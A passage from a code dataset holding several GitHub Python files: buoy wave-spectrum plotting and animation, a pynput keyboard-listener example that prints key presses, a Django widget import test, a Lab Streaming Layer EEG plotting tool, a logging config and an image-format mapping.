dataset[\"Hm0\"][i:j]\n self.Tp = dataset[\"Tp\"][i:j]\n\n # stokes drift\n dirr = np.radians(self.dirs)\n Ex = np.trapz(np.cos(dirr[None,:,None]) * self.E, x=dirr, axis=1)\n Ey = np.trapz(np.sin(dirr[None,:,None]) * self.E, x=dirr, axis=1)\n self.Us = self.stokes_drift(self.wfrq, Ex, z=0)\n self.Vs = self.stokes_drift(self.wfrq, Ey, z=0)\n\n # sonic anemometer\n self.Ua = dataset[\"Ua\"][i:j]\n self.Va = dataset[\"Va\"][i:j]\n self.ustar = dataset[\"ustar\"][i:j]\n \n # yaw and maximet data\n self.yaw = dataset['yaw'][i:j]\n self.Wspd = dataset[\"U10N\"][i:j]\n self.tWdir = (270 - dataset[\"tWdir\"][i:j]) % 360\n self.aWdir = np.arctan2(self.Va, self.Ua) * 180/np.pi\n\n # wind stress \n angle = -np.radians(self.aWdir)\n taux = -dataset[\"rhoa\"][i:j] * dataset[\"uw\"][i:j]\n tauy = -dataset[\"rhoa\"][i:j] * dataset[\"vw\"][i:j]\n self.Tx = taux * np.cos(angle) + tauy * np.sin(angle)\n self.Ty = -taux * np.sin(angle) + tauy * np.cos(angle)\n\n # drag coefficient\n self.CD = dataset[\"ustar\"][i:j]**2 / self.Wspd**2\n self.zL = dataset[\"zL\"][i:j]\n\n # do some conversions\n self.Uy = np.cos((self.yaw + 90) * np.pi/180)\n self.Vy = np.sin((self.yaw + 90) * np.pi/180)\n self.Um = self.Wspd * np.cos(self.tWdir * np.pi/180)\n self.Vm = self.Wspd * np.sin(self.tWdir * np.pi/180)\n\n # creat folder to store figures\n t_ini_str = t_ini.strftime('%Y%m%d')\n t_end_str = t_end.strftime('%Y%m%d')\n # TODO: choose anoher path to store animation\n self.folder = f\"./animation_{bomm_name}_{t_ini_str}_{t_end_str}/\"\n\n\n def remove_outliers(self, x):\n \"\"\"Recursively remove outliers from a give signal\"\"\"\n\n # compute mean and standar deviation\n xmean, xstd = nanmean(x), np.nanstd(x)\n\n # first remove values lying 5 time std\n x_clean = x.copy()\n x_clean[abs(x - xmean) > 5*xstd] = np.nan\n\n return x_clean\n\n\n def get_high_frequency_data(self, i):\n \"\"\"Get first level data corresponding to the same date\"\"\"\n\n # detrend function\n detrend = lambda x: x - nanmean(x)\n\n date = self.time[i]\n self.p.run(date)\n self.t_wind = np.arange(0, len(self.p.wnd[\"time\"])) / 60 / 100\n self.u_wind = self.remove_outliers(self.p.U_cor[0])\n self.v_wind = self.remove_outliers(self.p.U_cor[1])\n self.w_wind = self.remove_outliers(self.p.U_cor[2])\n #\n self.t_wave = np.arange(0, len(self.p.wav[\"time\"])) / 60 / 20\n self.Z = self.p.Z\n\n \n def set_limits(self, x, ax):\n \"\"\"Set the limit of the axes.\"\"\"\n\n xmin, xmax = np.floor(np.nanmin(x)), np.ceil(np.nanmax(x))\n ax.set_ylim((xmin, xmax))\n\n \n def stokes_drift(self, f, S, z=0):\n \"\"\"Compute stokes drift profile as Breivik et al 2016 eq5.\"\"\"\n \n # angular frequency and spectrum in right units\n g = 9.8\n w = 2*np.pi * f\n k = w**2 / g\n Sw = S / (2*np.pi)\n \n fac = 2 / g\n dummy = w**3 * Sw * np.exp(2*k*z)\n return np.trapz(fac*dummy[:,:80], w[:80], axis=1)\n\n \n def plot_wave_spectrum(self, i, ax):\n \"\"\"Make a plot of the wave spectrum for the given i index.\"\"\"\n\n polar_spectrum(self.wfrq, self.dirs, self.E[i,:,:],\n label=True, smin=-3., smax=2, fmax=0.5, ax=ax, cbar=True)\n #\n # plot_arrows\n qva = ax.quiver(0, 0, self.Ua[i], self.Va[i], scale=30, color=\"steelblue\")\n qvt = ax.quiver(0, 0, self.Tx[i], self.Ty[i], scale=0.5, color=\"darkblue\")\n qvs = ax.quiver(0, 0, self.Us[i], self.Vs[i], scale=0.3, color=\"darkred\")\n qvy = ax.quiver(0, 0, self.Uy[i], self.Vy[i], scale=1, color=\"gold\", headwidth=0)\n\n ax.quiverkey(qva, 0.10, -0.08, 5.00, label=\"$U_{10} = 5\\,\\mathrm{m/s}$\")\n ax.quiverkey(qvs, 0.38, -0.08, 0.05, label=\"$U_s = 5\\,\\mathrm{cm/s}$\")\n ax.quiverkey(qvt, 0.66, -0.08, 0.10, label=\"$\\\\tau = 0.1\\,\\mathrm{N/m^2}$\")\n ax.quiverkey(qvy, 0.94, -0.08, 0.20, label=\"$\\psi$\")\n\n # plot wind-sea / swell delimiter\n wdirs = np.radians((self.dirs - self.tWdir[i]))\n fcut = 0.83 * 9.8 / (2 * np.pi * self.Wspd[i] * np.cos(wdirs)**1)\n # fcut[abs(wdirs)>=np.pi/3] = np.nan\n fcutx = fcut * np.cos(self.dirs*np.pi/180)\n fcuty = fcut * np.sin(self.dirs*np.pi/180)\n ax.plot(fcutx, fcuty, lw=0.5, ls=\"-\", color=\"0.5\")\n\n # TODO:\n # - add Ustar and Ustokes\n\n # # set wind label\n ulabel = f\"$U_{{10}} = {self.Wspd[i]:.2f}$ m/s\\n\" + \\\n f\"$\\\\theta_{{u}} = {self.tWdir[i]:.2f}^\\circ$\"\n ax.text(0.01, 0.98, ulabel, transform=ax.transAxes, ha=\"left\", va=\"top\")\n \n title = self.time[i].strftime(\"%Y-%m-%d %H:%M:%S\")\n ax.set_title(title)\n\n # remove lower labels\n ax.set_xlabel('')\n ax.set_xticklabels('')\n\n\n def make_plot(self, i):\n \"\"\"Start the figure and plot permanent data\"\"\"\n\n # create canvas\n fig = plt.figure(figsize=(10,8))\n #\n ax0 = fig.add_axes([0.05, 0.50, 0.42, 0.45])\n ax1 = fig.add_axes([0.55, 0.82, 0.40, 0.13])\n ax2 = fig.add_axes([0.55, 0.66, 0.40, 0.13])\n ax3 = fig.add_axes([0.55, 0.50, 0.40, 0.13])\n #\n bx1 = fig.add_axes([0.05, 0.33, 0.90, 0.10])\n bx2 = fig.add_axes([0.05, 0.23, 0.90, 0.10])\n bx3 = fig.add_axes([0.05, 0.13, 0.90, 0.10])\n #\n cx0 = fig.add_axes([0.05, 0.03, 0.90, 0.10])\n\n\n ax1.set_title(self.title)\n ax1.plot(self.time, self.Wspd, c=\"k\")\n ax2.plot(self.time, self.Hs, c=\"k\")\n ax3.plot(self.time, self.Tp, c=\"k\")\n #\n ax1.set_ylabel(\"$U_{10}\\,\\mathrm{[m/s]}$\")\n ax2.set_ylabel(\"$H_{m0}\\,\\mathrm{[m]}$\")\n ax3.set_ylabel(\"$T_{p}\\,\\mathrm{[s]}$\")\n #\n self.set_limits(self.Wspd, ax1)\n self.set_limits(self.Hs, ax2)\n self.set_limits(self.Tp, ax3)\n #\n for ax in (ax1, ax2, ax3):\n ax.yaxis.tick_right()\n ax.yaxis.set_major_locator(plt.MaxNLocator(4))\n ax.yaxis.set_label_position(\"right\")\n ax.yaxis.set_ticks_position(\"both\")\n ax.xaxis.set_minor_locator(mdates.HourLocator(range(0,24,3)))\n ax.xaxis.set_major_locator(mdates.DayLocator(interval=1))\n ax.xaxis.set_major_formatter(mdates.DateFormatter(\"%b %d\\n%Y\"))\n\n\n ax1.set_xticklabels([''])\n ax2.set_xticklabels([''])\n # \n # plot high frequency data\n try:\n self.get_high_frequency_data(i)\n # \n bx1.plot(self.t_wind, self.u_wind, color=\"0.9\")\n bx2.plot(self.t_wind, self.v_wind, color=\"0.9\")\n bx3.plot(self.t_wind, self.w_wind, color=\"0.9\")\n # bx1.set_ylim((-20,20))\n # bx2.set_ylim((-20,20))\n # bx3.set_ylim((-5,5))\n #\n n_smooth = 200\n bx1.plot(self.t_wind[::n_smooth], self.u_wind[::n_smooth])\n bx2.plot(self.t_wind[::n_smooth], self.v_wind[::n_smooth])\n bx3.plot(self.t_wind[::n_smooth], self.w_wind[::n_smooth])\n #\n bx1.set_ylabel(\"$u\\,\\mathrm{[m/s]}$\")\n bx2.set_ylabel(\"$v\\,\\mathrm{[m/s]}$\")\n bx3.set_ylabel(\"$w\\,\\mathrm{[m/s]}$\")\n #\n cx0.plot(self.t_wave, self.Z[:,self.p.valid_wires_index])\n cx0.legend(self.p.valid_wires, loc=0, ncol=6)\n cx0.set_ylabel(\"$\\\\eta\\,\\mathrm{[m]}$\")\n # cx0.set_ylim((-2,2))\n #\n for ax in (bx1, bx2, bx3, cx0):\n ax.yaxis.set_label_position(\"right\")\n\n except:\n pass\n\n # plot wave spectrum\n self.plot_wave_spectrum(i, ax0)\n point1, = ax1.plot(self.time[i], self.Wspd[i], \"oy\", ms=3)\n point2, = ax2.plot(self.time[i], self.Hs[i], \"oy\", ms=3)\n point3, = ax3.plot(self.time[i], self.Tp[i], \"oy\", ms=3)\n\n\n return fig, ax0, ax1, ax2, ax3\n\n\n def animate(self):\n \"\"\"Loop for each time.\"\"\"\n\n # create folder if it does not exist\n os.system(f\"mkdir -p {self.folder}\")\n\n for i in range(len(self.time)):\n fig, *ax = self.make_plot(i)\n figname = f\"{self.folder}/{self.time[i].strftime('%Y%m%d%H%M')}.png\"\n fig.savefig(figname, dpi=100)\n print(f\"Plotting file ---> {figname}\")\n plt.close()\n\n c = f\"convert {self.folder}/*.png -delay 100 -quality 50 {self.folder}/movie.gif\"\n os.system(c)\n # ffmpeg -i movie.gif -movflags faststart -pix_fmt yuv420p -vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" movie.mp4\n # ffmpeg -y -framerate 2 -pattern_type glob -i '*.png' -movflags faststart -pix_fmt yuv420p -vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" movie.mp4\n\n\n def time_directional_spectrum(self, fname=None):\n \"\"\"Nice way to visualize the time-varying directional wave spectrum\"\"\"\n\n # determine number of time\n ntime = len(self.time)\n step = np.max((1, int(ntime/50)))\n\n # compute energy components\n dirr = np.radians(self.dirs)\n S = np.trapz(self.E, x=dirr, axis=1).T\n Ex = np.trapz(np.cos(dirr[None,:,None]) * self.E, x=dirr, axis=1).T / S\n Ey = np.trapz(np.sin(dirr[None,:,None]) * self.E, x=dirr, axis=1).T / S\n\n # remove some elements\n ix_remove = np.logical_or(self.wfrq < 0.06, self.wfrq > 0.8)\n Ex[ix_remove] = np.nan\n Ey[ix_remove] = np.nan\n\n # create colormap\n smin, smax = -3, 1\n colors = [\"#FFFFFF\", \"#01DFA5\", \"#FE642E\", \"#08298A\", \"#01A9DB\"]\n cmap = mcolors.LinearSegmentedColormap.from_list('cmap', colors, N=1024)\n norm = mcolors.LogNorm(vmin=10**smin, vmax=10**smax)\n\n # do plot spectrum\n fig, ax = plt.subplots(1, figsize=(7,4))\n ax.set_title(self.title)\n #\n ax.plot(s.time, 1/self.Tp, \".\", ms=3, color=\"0.5\", alpha=0.5)\n pc = ax.pcolormesh(self.time, self.wfrq, S, cmap=cmap, norm=norm)\n qv = ax.quiver(self.time[::step], self.wfrq[::4], Ex[::4,::step], Ey[::4,::step],\n scale=50, angles=\"uv\", color=\"black\")\n\n # plot wind at 0.9 freq\n qw = ax.quiver(self.time[::step], 0.85, self.Ua[::step], self.Va[::step],\n scale=200, width=0.004, headwidth=2.5, angles=\"uv\", color=\"blue\")\n ax.quiverkey(qw, 0.80, 1.02, 10, label=\"$U_{10} = 10\\,\\mathrm{m/s}$\",\n labelpos=\"E\")\n\n # colorbar\n fig.colorbar(pc, ax=ax, cax=colorax(ax))#, ticks=10**np.arange(smin, smax+1))\n\n # tweak the axes\n ax.set_xlim((self.time[0], self.time[-1]+dt.timedelta(minutes=30)))\n ax.set_ylim((0.05, 0.95))\n ax.set_ylabel(\"$f\\,\\mathrm{[Hz]}$\")\n #\n ax.xaxis.set_minor_locator(mdates.HourLocator(range(0,24,3)))\n ax.xaxis.set_major_locator(mdates.DayLocator(interval=1))\n ax.xaxis.set_major_formatter(mdates.DateFormatter(\"%b %d\\n%Y\"))\n\n if fname:\n fig.savefig(fname, dpi=600)\n\n return fig, ax\n\n# }}}\n\n\nif __name__ == \"__main__\":\n\n # case when we have a cold front observed by a sar image\n if True:\n t_ini = dt.datetime(2018, 9, 11)\n t_end = dt.datetime(2018, 9, 16)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 30)\n # s.animate()\n s.time_directional_spectrum(\"./events/spectra_event_1.png\")\n\n # define initial and final time (no more than 3 or 4 days)\n if True:\n t_ini = dt.datetime(2018, 10, 15)\n t_end = dt.datetime(2018, 10, 20)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 30)\n s.animate()\n s.time_directional_spectrum(\"./events/spectra_event_2.png\")\n\n # case when we observed cross-winds and slanting fecth\n if True:\n t_ini = dt.datetime(2018, 11, 9)\n t_end = dt.datetime(2018, 11, 16)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 30)\n s.animate()\n s.time_directional_spectrum(\"./events/spectra_event_3.png\")\n\n # plot specific date only\n if False:\n\n # bomm1-its\n date = dt.datetime(2017, 12, 8, 14, 0)\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_its.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n s.make_plot(i)\n \n # bomm1-per1\n date = dt.datetime(2018, 10, 16, 6, 0)\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n s.make_plot(i)\n\n # terrasar x\n if True:\n \n dates_tsx = [\n '20180713T122722', '20180714T003126', '20180720T000255',\n '20180822T002322', '20180917T122725', '20180928T122726',\n '20181016T002302', '20181020T122727', '20181021T003133',\n '20181112T003131', '20181118T002259'\n ]\n\n for strdate in dates_tsx:\n date = dt.datetime.strptime(strdate, \"%Y%m%dT%H%M%S\")\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n fig, *ax = s.make_plot(i)\n fig.savefig(f\"./terrasarx/{strdate}_10min.png\", dpi=300)\n plt.close(fig)\n\n # sentinel\n if True:\n\n dates_snt = [\n '20180712T003311', '20180805T003313', '20180807T122429',\n '20180817T003314', '20180819T122429', '20180831T122430',\n '20180910T003315', '20180912T122430', '20181023T002513',\n '20181109T003315', '20181111T122431', '20181203T003315',\n '20181205T122430'\n ]\n\n for strdate in dates_snt:\n date = dt.datetime.strptime(strdate, \"%Y%m%dT%H%M%S\")\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n fig, *ax = s.make_plot(i)\n fig.savefig(f\"./sentinel/{strdate}_10min.png\", dpi=300)\n plt.close(fig)\n","repo_name":"dspelaez/bomm","sub_path":"src/visualization/spectra_animation.py","file_name":"spectra_animation.py","file_ext":"py","file_size_in_byte":16290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12558731267","text":"from pynput import mouse, keyboard\nimport functools\nfrom queue import Queue\n\n\n\n\nclass MouseEvent():\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n \nclass KeyBoardRecoder():\n def __init__(self, event_queue):\n ''' q is event queue '''\n self.event_queue = event_queue\n self.listener = keyboard.Listener(\n on_press=self.on_press,\n on_release=self.on_release\n )\n\n def start(self):\n self.listener.start()\n\n def join(self):\n self.listener.join()\n\n def on_press(self, key):\n try:\n print('alphanumeric key {0} pressed'.format(key.char))\n except AttributeError:\n print('special key {0} pressed'.format(key))\n\n def on_release(self, key):\n print('{0} released'.format(key))\n if key == keyboard.Key.esc:\n # Stop listener\n return False\n\nif __name__ == \"__main__\":\n q = Queue()\n keyboard_recoder = KeyBoardRecoder(q)\n keyboard_recoder.start()\n keyboard_recoder.join()","repo_name":"osljw/workspace","sub_path":"workspace_python/simulation/listen_keyboard.py","file_name":"listen_keyboard.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34342122549","text":"import pytest\nimport tablib\n\nfrom backend.models import Site\nfrom backend.models.widget import SiteWidget, SiteWidgetList, SiteWidgetListOrder\nfrom backend.resources.site_homepage_widgets import SiteHomepageWidgetsResource\nfrom backend.tests import factories\n\n\n@pytest.mark.skip(\"Tests are for initial migration only\")\nclass TestSiteHomepageWidgetsImport:\n @staticmethod\n def build_table(data: list[str]):\n headers = [\n \"id,created,created_by,last_modified,last_modified_by,title,slug,visibility,language,contact_email,\"\n \"homepage_widgets\",\n ]\n table = tablib.import_set(\"\\n\".join(headers + data), format=\"csv\")\n return table\n\n @pytest.mark.django_db\n def test_import_base_data(self):\n site = factories.SiteFactory.create()\n user1 = factories.UserFactory.create()\n user2 = factories.UserFactory.create()\n widget1 = factories.SiteWidgetFactory.create(site=site)\n widget2 = factories.SiteWidgetFactory.create(site=site)\n\n data = [\n f\"{str(site.id)},2023-02-02 21:21:10.713,{user1.email},2023-02-02 21:21:39.864,{user2.email},Sample site \"\n f'title,sample-site-slug,Public,,test@email.com,\"{str(widget1.id)},{str(widget2.id)}\"',\n ]\n table = self.build_table(data)\n\n assert site.homepage is None\n assert len(SiteWidget.objects.all()) == 2\n assert len(SiteWidgetList.objects.all()) == 0\n assert len(SiteWidgetListOrder.objects.all()) == 0\n\n result = SiteHomepageWidgetsResource().import_data(dataset=table)\n\n assert not result.has_errors()\n assert not result.has_validation_errors()\n assert result.totals[\"update\"] == len(data)\n site = Site.objects.get(id=table[\"id\"][0])\n assert site.homepage is not None\n\n assert (\n SiteWidgetListOrder.objects.get(\n site_widget_list=site.homepage, order=0\n ).site_widget\n == widget1\n )\n assert (\n SiteWidgetListOrder.objects.get(\n site_widget_list=site.homepage, order=1\n ).site_widget\n == widget2\n )\n\n assert site.homepage.widgets.count() == 2\n assert len(SiteWidget.objects.all()) == 2\n assert len(SiteWidgetList.objects.all()) == 1\n assert len(SiteWidgetListOrder.objects.all()) == 2\n","repo_name":"First-Peoples-Cultural-Council/fv-be","sub_path":"firstvoices/backend/tests/test_resources/test_site_homepage_widgets.py","file_name":"test_site_homepage_widgets.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"14128652862","text":"# %%\n\"\"\"\nReceiveAndPlot example for LSL\nThis example shows data from all found outlets in realtime.\nIt illustrates the following use cases:\n- efficiently pulling data, re-using buffers\n- automatically discarding older samples\n- online postprocessing\n\"\"\"\n\nimport math\nimport sys\nfrom typing import List\n\nimport numpy as np\nimport pylsl\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore, QtWidgets\n\n# %%\n\n# Basic parameters for the plotting window\nplot_duration = 10 # how many seconds of data to show\nupdate_interval = 30 # ms between screen updates\npull_interval = 20 # ms between each pull operation\n\n# Define axis limits\nylims = None # auto-range\n# ylims = (-1, 1) # fixed range\n\n# Name of a single stream to plot (optional)\nsingle_stream_name = ''\n# single_stream_name = 'UN-2019.07.77_filtered'\n\n# A specific string to search for in the stream names (optional)\nstream_str = ''\n# stream_str = 'UN'\n\n# Choose to set the axis limits for a specific stream\nlim_name = ''\n\n\nclass Inlet:\n \"\"\"\n Base class to represent a plottable inlet\n \"\"\"\n\n def __init__(self, info: pylsl.StreamInfo):\n # create an inlet and connect it to the outlet we found earlier.\n # max_buflen is set so data older the plot_duration is discarded\n # automatically and we only pull data new enough to show it\n\n # Also, perform online clock synchronization so all streams are in the\n # same time domain as the local lsl_clock()\n # (see https://labstreaminglayer.readthedocs.io/projects/liblsl/ref/enums.html#_CPPv414proc_clocksync)\n # and dejitter timestamps\n self.inlet = pylsl.StreamInlet(\n info,\n max_buflen=plot_duration,\n processing_flags=pylsl.proc_clocksync | pylsl.proc_dejitter,\n )\n # store the name and channel count\n self.name = info.name()\n self.channel_count = info.channel_count()\n self.channel_names = [\n 'Channel ' + str(i + 1) for i in range(self.channel_count)\n ]\n # Only the first 8 channels are data channels in Unicorn\n if 'un' in self.name.lower() or self.channel_count == 17:\n self.channel_count = 8\n self.channel_names = ['Fz', 'C3', 'Cz', 'C4', 'Pz', 'PO7', 'Oz', 'PO8']\n self.color_cycle = [\n '8dd3c7',\n 'feffb3',\n 'bfbbd9',\n 'fa8174',\n '81b1d2',\n 'fdb462',\n 'b3de69',\n 'bc82bd',\n 'ccebc4',\n 'ffed6f',\n ]\n\n def pull_and_plot(self, plot_time: float):\n \"\"\"\n Pull data from the inlet and add it to the plot.\n :param plot_time: lowest timestamp that's still visible in the plot\n :param plt: the plot the data should be shown on\n \"\"\"\n # We don't know what to do with a generic inlet, so we skip it.\n # It will be defined in the sub-classes\n pass\n\n\nclass DataInlet(Inlet):\n \"\"\"\n A DataInlet represents an inlet with continuous, multi-channel data that\n should be plotted as multiple lines.\n \"\"\"\n\n dtypes = [[], np.float32, np.float64, None, np.int32, np.int16, np.int8, np.int64]\n\n def __init__(self, info: pylsl.StreamInfo, win: pg.GraphicsLayoutWidget):\n super().__init__(info)\n\n self.win = win\n\n # calculate the size for our buffer, i.e. two times the displayed data\n bufsize = (\n 2 * math.ceil(info.nominal_srate() * plot_duration),\n info.channel_count(),\n )\n self.buffer = np.empty(bufsize, dtype=self.dtypes[info.channel_format()])\n empty = np.array([])\n # create one curve object for each channel/line that will handle displaying the data\n self.curves = [\n pg.PlotCurveItem(\n x=empty,\n y=empty,\n # autoDownsample=True,\n pen=pg.mkPen(self.color_cycle[i % len(self.color_cycle)], width=1),\n )\n for i in range(self.channel_count)\n ]\n\n offset = 0\n tmp = win.getItem(row=offset, col=0)\n while tmp is not None:\n offset = offset + 1\n tmp = self.win.getItem(row=offset, col=0)\n\n for i, curve in enumerate(self.curves):\n i_new = i + offset\n tmp_plt = self.win.addPlot(row=i_new, col=0, name=str(i))\n tmp_plt.setClipToView(True)\n tmp_plt.setDownsampling(mode='peak')\n tmp_plt.addItem(item=curve)\n tmp_plt.enableAutoRange(axis='x', enable=True)\n tmp_plt.setLabel('right', self.channel_names[i])\n tmp_plt.getAxis('right').setTicks([[]])\n if ylims is not None:\n if lim_name == '':\n tmp_plt.setRange(yRange=ylims)\n else:\n if lim_name.lower() in self.name.lower():\n tmp_plt.setRange(yRange=ylims)\n if i_new > offset:\n tmp_plt.setXLink(str(i_new - 1))\n if i == 0:\n tmp_plt.setTitle(self.name)\n if i != len(self.curves) - 1:\n tmp_plt.getAxis('bottom').setTicks([[]])\n\n def pull_and_plot(self, plot_time):\n # pull the data\n _, ts = self.inlet.pull_chunk(\n timeout=0.0, max_samples=self.buffer.shape[0], dest_obj=self.buffer\n )\n # ts will be empty if no samples were pulled, a list of timestamps otherwise\n if ts:\n ts = np.asarray(ts)\n y = self.buffer[0 : ts.size, :]\n this_x = None\n old_offset = 0\n new_offset = 0\n for ch_ix in range(self.channel_count):\n # we don't pull an entire screen's worth of data, so we have to\n # trim the old data and append the new data to it\n old_x, old_y = self.curves[ch_ix].getData()\n # the timestamps are identical for all channels, so we need to # do this calculation only once\n if ch_ix == 0:\n # find the index of the first sample that's still visible,\n # i.e. newer than the left border of the plot\n old_offset = old_x.searchsorted(plot_time)\n # same for the new data, in case we pulled more data than\n # can be shown at once\n new_offset = ts.searchsorted(plot_time)\n # append new timestamps to the trimmed old timestamps\n this_x = np.hstack((old_x[old_offset:], ts[new_offset:]))\n # append new data to the trimmed old data\n this_y = np.hstack((old_y[old_offset:], y[new_offset:, ch_ix] - ch_ix))\n # replace the old data\n self.curves[ch_ix].setData(this_x, this_y)\n\n\nclass MarkerInlet(Inlet):\n \"\"\"\n A MarkerInlet shows events that happen sporadically as vertical lines\n \"\"\"\n\n def __init__(self, info: pylsl.StreamInfo, win: pg.GraphicsLayoutWidget):\n super().__init__(info)\n self.win = win\n\n i = 0\n tmp = win.getItem(row=i, col=0)\n while tmp is not None:\n i = i + 1\n tmp = self.win.getItem(row=i, col=0)\n\n self.plt = self.win.addPlot(row=i, col=0, name='markers')\n self.plt.setLabel('right', 'Markers')\n self.plt.getAxis('right').setTicks([[]])\n self.plt.getAxis('left').setTicks([[]])\n\n if i > 0:\n self.plt.setXLink(str(i - 1))\n self.win.getItem(row=i - 1, col=0).getAxis('bottom').setTicks([[]])\n\n def pull_and_plot(self, plot_time):\n # TODO: purge old markers\n strings, timestamps = self.inlet.pull_chunk(0)\n if timestamps:\n for string, ts in zip(strings, timestamps):\n self.plt.addItem(\n pg.InfiniteLine(ts, angle=90, movable=False, label=string[0])\n )\n\n\ndef scroll():\n \"\"\"\n Move the view so the data appears to scroll\n \"\"\"\n # We show data only up to a timepoint shortly before the current time\n # so new data doesn't suddenly appear in the middle of the plot\n fudge_factor = pull_interval * 0.5\n plot_time = pylsl.local_clock()\n plt.setXRange(plot_time - plot_duration + fudge_factor, plot_time - fudge_factor)\n\n\ndef update():\n # Read data from the inlet. Use a timeout of 0.0 so we don't block GUI interaction.\n mintime = pylsl.local_clock() - plot_duration\n # call pull_and_plot for each inlet.\n # Special handling of inlet types (markers, continuous data) is done in\n # the different inlet classes.\n for inlet in inlets:\n inlet.pull_and_plot(mintime)\n\n\ndef get_stream_infos():\n print(\"Looking for streams...\")\n\n # If there is a specific stream to be looked for\n if single_stream_name != '':\n # Specificially search for it\n infos = pylsl.resolve_byprop('name', single_stream_name)\n\n else:\n num_streams = 0\n\n # Stay in the while loop until streams are found\n while num_streams == 0:\n # Resolve all available LSL streams\n infos = pylsl.resolve_streams()\n num_streams = len(infos)\n\n # If there is a string to search for in the stream names\n if stream_str != '':\n # Filter out the streams with names without this string\n infos = [info for info in infos if stream_str in info.name()]\n\n # Sort the streams based on the stream type\n # --> marker streams at the end of the list\n infos.sort(key=lambda info: 'marker' in info.name().lower())\n\n return infos\n\n\ndef get_inlets(infos, win):\n # Initialize an empty list for the stream inlets\n inlets: List[Inlet] = []\n\n # Iterate over found streams, creating specialized inlet objects that will\n # handle plotting the data\n for info in infos:\n if 'marker' in info.type().lower():\n if (\n info.nominal_srate() != pylsl.IRREGULAR_RATE\n or info.channel_format() != pylsl.cf_string\n ):\n print('Invalid marker stream ' + info.name())\n print('Adding marker inlet: ' + info.name())\n inlets.append(MarkerInlet(info, win))\n elif (\n info.nominal_srate() != pylsl.IRREGULAR_RATE\n and info.channel_format() != pylsl.cf_string\n ):\n print('Adding data inlet: ' + info.name())\n inlets.append(DataInlet(info, win))\n else:\n print('Don\\'t know what to do with stream ' + info.name())\n\n return inlets\n\n\nif __name__ == '__main__':\n # Get a list of available LSL stream infos\n infos = get_stream_infos()\n\n # Create the pyqtgraph window\n win = pg.GraphicsLayoutWidget(show=True, title='LSL Data Stream')\n view = pg.widgets.RemoteGraphicsView.RemoteGraphicsView()\n pg.setConfigOptions(antialias=True)\n\n # Get a list of LSL inlets\n inlets = get_inlets(infos, win)\n\n # Get the first subplot for synchronizing with other subplots\n plt = win.getItem(row=0, col=0)\n\n # vb = win.addViewBox(row=0, col=0, colspan=inlets[0].channel_count)\n\n # Create a timer that will move the view every update_interval ms\n update_timer = QtCore.QTimer()\n update_timer.timeout.connect(scroll)\n update_timer.start(update_interval)\n\n # Create a timer that will pull and add new data occasionally\n pull_timer = QtCore.QTimer()\n pull_timer.timeout.connect(update)\n pull_timer.start(pull_interval)\n\n # Start Qt event loop unless running in interactive mode or using pyside\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtWidgets.QApplication.instance().exec_()\n\n# %%\n","repo_name":"StarikovaA/PBSM","sub_path":"online_pr/eye_bklinking_detection/plot_lsl_stream.py","file_name":"plot_lsl_stream.py","file_ext":"py","file_size_in_byte":11650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10125900640","text":"from logging.config import dictConfig\n\nlogging_config = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"standard\": {\"format\": \"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"}\n },\n \"handlers\": {\n \"default\": {\n \"level\": \"INFO\",\n \"formatter\": \"standard\",\n \"class\": \"logging.StreamHandler\",\n \"stream\": \"ext://sys.stdout\",\n }\n },\n \"root\": {\"handlers\": [\"default\"], \"level\": \"INFO\", \"propagate\": False},\n}\n\ndictConfig(logging_config)\n\n\nclass Config:\n CITY = \"Kyiv\"\n APPLICATION_X_TOKEN = \"asjdh98as7agejh325l4359ta1ysfdof\"\n\n WEATHER_API_KEY = \"\"\n UNITS = \"metric\"\n\n DATABASE_NAME = \"database.db\"\n TABLE_NAME = \"temperature\"\n","repo_name":"TetianaHrunyk/weather-microservice","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5958178732","text":"\n# Maps formats to Pillow's accepted image formats\nMAPPING = {\n 'jpg': 'JPEG',\n 'jpeg': 'JPEG',\n 'gif': 'GIF',\n 'png': 'PNG',\n 'pdf': 'PDF',\n 'tif': 'TIFF',\n 'tiff': 'TIFF',\n 'webp': 'WEBP'\n}\n\nEXTENSIONS = {\n 'JPEG': 'jpg',\n 'GIF': 'gif',\n 'PNG': 'png',\n 'PDF': 'pdf',\n 'TIFF': 'tif',\n 'BMP': 'bmp',\n 'WEBP': 'webp'\n}\n","repo_name":"ui/da-vinci","sub_path":"da_vinci/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} 